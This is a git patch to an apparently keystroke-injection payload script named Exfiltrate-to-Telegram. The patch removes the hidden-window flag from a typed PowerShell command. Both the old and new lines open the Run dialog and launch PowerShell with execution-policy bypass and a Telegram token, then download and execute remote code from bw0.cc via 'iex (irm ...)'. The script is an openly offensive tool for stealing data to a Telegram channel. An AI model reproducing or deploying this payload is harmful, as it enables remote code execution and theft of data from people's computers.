From 6356cba0044162940a924771b3cfe0633b8cacc2 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Fri, 20 Jun 2025 10:54:28 +0000 Subject: [PATCH] Update Exfiltrate-to-Telegram.txt --- Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt b/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt index cad6217..b361525 100644 --- a/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt +++ b/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt @@ -14,6 +14,6 @@ REM open powershell (remove -W Hidden to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN'; iex (irm bw0.cc/extg) +STRING powershell -Ep Bypass -C $tg='TELEGRAM_TOKEN'; iex (irm bw0.cc/extg) ENTER